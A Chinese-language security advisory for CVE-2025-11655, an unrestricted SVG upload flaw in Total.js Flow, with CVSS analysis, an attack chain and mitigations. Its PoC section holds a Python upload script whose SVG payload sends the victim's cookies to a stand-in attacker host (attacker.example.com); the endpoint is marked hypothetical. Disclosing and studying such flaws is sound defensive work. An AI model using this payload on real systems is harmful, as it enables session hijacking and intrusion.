CVE-2025-11655：Total.js Flow SVG文件处理器未限制上传漏洞

漏洞信息

漏洞编号

CVE-2025-11655

漏洞类型

任意文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Total.js Flow

漏洞概述

CVE-2025-11655是Total.js Flow平台中发现的一个安全漏洞，CVSS评分为4.7，属于中危级别。该漏洞存在于SVG文件处理器（SVG File Handler）组件的未知函数中，攻击者可以通过恶意构造的请求执行未限制上传（Unrestricted Upload）操作。由于Total.js Flow采用持续交付与滚动发布模式，官方未提供受影响版本或修复版本的详细信息。

该漏洞可被远程利用，攻击者通过网络即可发起攻击，无需用户交互，但需要高权限（PR:H）才能成功执行。漏洞的存在可能导致攻击者上传恶意文件到服务器，进而影响系统的机密性、完整性和可用性。虽然每项影响均为低级别（C:L/I:L/A:L），但结合上传恶意文件的能力，攻击者可能进一步实现远程代码执行、权限提升或持久化访问。

该漏洞的发现者通过[email protected]渠道披露，供应商在漏洞披露前已被通知但未做出任何回应。目前该漏洞的利用代码已公开发布，可能被恶意攻击者利用，对使用Total.js Flow的企业和组织构成潜在威胁。建议使用该产品的用户密切关注官方更新动态，并采取临时缓解措施降低风险。

技术细节

该漏洞的核心问题在于Total.js Flow的SVG文件处理器未对上传的文件类型和内容进行充分的验证与限制。具体技术原理如下：

1. **漏洞触发点**：SVG File Handler组件在处理用户上传的文件时，未能正确验证文件的实际内容与扩展名是否匹配，也未对SVG文件中可能嵌入的恶意脚本进行过滤。SVG文件本质上是XML格式，可以包含JavaScript代码、事件处理器和外部引用，这使得SVG文件成为潜在的恶意载荷载体。

2. **利用方式**：攻击者首先需要拥有系统的高权限账户（PR:H），这通常意味着攻击者可能已经通过其他途径获取了部分访问权限，或者该系统本身面向管理员开放了文件上传功能。获取权限后，攻击者可以构造一个包含恶意JavaScript或服务器端代码的SVG文件，通过SVG File Handler上传到服务器。

3. **攻击影响**：由于上传不受限制，攻击者可以上传任意类型的文件，包括但不限于：包含恶意脚本的SVG文件（可触发XSS攻击）、WebShell文件（可能导致远程代码执行）、以及用于覆盖现有系统文件的恶意文件。上传成功后，攻击者可以根据上传文件的类型和服务器配置，执行进一步的攻击活动。

4. **CVSS向量分析**：CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L表明该漏洞通过网络利用（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H），无需用户交互（UI:N），对机密性、完整性和可用性均有一定程度的影响。

攻击链分析

STEP 1

步骤1：获取高权限访问

攻击者需要首先获取Total.js Flow系统的高权限账户（PR:H）。这可能通过暴力破解、凭据填充、社会工程学或利用其他已知漏洞实现。

STEP 2

步骤2：构造恶意SVG文件

攻击者创建一个包含恶意载荷的SVG文件。由于SVG是XML格式，可以嵌入JavaScript代码、事件处理器、外部脚本引用或服务器端代码片段。

STEP 3

步骤3：上传恶意文件

利用SVG File Handler组件的上传功能，将构造的恶意SVG文件上传到服务器。由于漏洞缺乏文件类型和内容的验证，上传操作将成功执行。

STEP 4

步骤4：触发恶意载荷

上传成功后，攻击者通过访问上传文件的URL触发恶意载荷。根据载荷类型，可能导致XSS攻击、会话劫持、远程代码执行或系统文件覆盖。

STEP 5

步骤5：权限维持与数据窃取

攻击者在系统中建立持久化访问机制，如上传WebShell、创建后门账户或窃取敏感数据，进一步扩大攻击范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11655 PoC - Total.js Flow SVG File Handler Unrestricted Upload
# This PoC demonstrates the unrestricted file upload vulnerability in Total.js Flow's SVG File Handler

import requests

# Target configuration
TARGET_URL = "https://target.example.com"
UPLOAD_ENDPOINT = "/api/flow/svg/upload"  # Hypothetical endpoint for SVG upload

# Attacker credentials (high privilege required - PR:H)
AUTH_TOKEN = "your_auth_token_here"

# Malicious SVG payload with embedded JavaScript
malicious_svg = '''<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
    <script type="text/javascript">
        // Malicious payload - can be customized for various attacks
        // Example: XSS payload for session hijacking
        var cookie = document.cookie;
        var img = new Image();
        img.src = "https://attacker.example.com/steal?cookie=" + encodeURIComponent(cookie);

        // Or could include server-side code for RCE attempts
        // depending on server-side processing of SVG files
    </script>
    <rect x="0" y="0" width="200" height="200" fill="red"/>
    <text x="50" y="100" fill="white">Malicious SVG</text>
</svg>'''

def exploit():
    """
    Exploit the unrestricted upload vulnerability in Total.js Flow SVG File Handler.
    The vulnerability allows uploading malicious SVG files without proper validation.
    """
    headers = {
        "Authorization": f"Bearer {AUTH_TOKEN}",
        "Content-Type": "multipart/form-data"
    }

    files = {
        "file": ("malicious.svg", malicious_svg, "image/svg+xml")
    }

    try:
        response = requests.post(
            f"{TARGET_URL}{UPLOAD_ENDPOINT}",
            headers=headers,
            files=files,
            verify=False
        )

        if response.status_code == 200:
            print(f"[+] Upload successful!")
            print(f"[+] Response: {response.text}")
            print(f"[+] File uploaded to: {TARGET_URL}/uploads/malicious.svg")
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            print(f"[-] Response: {response.text}")

    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit()

影响范围

Total.js Flow <= 673ef9144dd25d4f4fd4fdfda5af27f230198924

防御指南

临时缓解措施

在官方发布修复补丁之前，建议采取以下临时缓解措施：1）限制对SVG File Handler功能的访问，仅允许受信任的管理员使用；2）在Web服务器或反向代理层面实施文件上传过滤，阻止包含恶意内容的SVG文件；3）将上传目录设置为不可执行，防止上传的脚本文件被执行；4）部署WAF规则检测和阻止可疑的文件上传请求；5）监控异常的文件上传行为，及时发现潜在攻击；6）定期检查已上传文件，清理可疑内容；7）考虑暂时禁用SVG文件上传功能，使用其他安全的图片格式替代。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11655
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11655
3 Details https://www.cvedetails.com/cve/CVE-2025-11655/
4 VulDB https://vuldb.com/cve/CVE-2025-11655
5 Link https://vuldb.com/?ctiid.328072
6 Link https://vuldb.com/?id.328072
7 Link https://vuldb.com/?submit.665479
8 Link https://vuldb.com/?submit.665497